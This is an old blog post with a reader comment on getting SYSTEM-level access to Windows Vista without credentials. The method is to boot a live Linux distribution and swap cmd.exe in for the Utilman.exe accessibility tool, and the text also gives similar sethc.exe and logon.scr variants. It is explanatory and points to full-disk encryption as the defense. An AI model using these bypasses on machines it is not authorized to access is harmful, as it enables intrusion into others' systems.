Gaining System-Level Access To Vista
[Quote:]
This video shows a method by which a user can use a Linux distro called BackTrack to gain system access to Windows Vista without logging into Windows or knowing the username or password for any accounts. To accomplish this, the user renames cmd.exe to Utilman.exe — this is the program that brings up the Accessibility options for users without sight or with limited vision. The attack takes advantage of the fact that the Utility Manager can be invoked before the user logs into the system. The user gains System access, which is a level higher than Administrator.
Which just goes to prove, if you have physical access to a machine, usually it’s game over. Only full disk encryption with a boot password will help with this one.
something similar works with XP with C:\windows\system32\sethc.exe (StickyKeys).
May 27th, 2008 at 14:45
The trick is as old as NT4 (and W2K), where renaming the logon screensaver logon.scr to cmd.exe did the same trick. Simply boot and wait for the screensaver to kick in - which now is a cmd prompt with full access. This particular trick no longer works in XP, but as you mentioned, other - very similar - workarounds do. I guess no-one at MS ever spent any time actually thinking about the basic idea of the trick and solving it once and for all, it seems they rather spend their time patching every implementation of it. Someone there must either be very bored or be missing some marbles.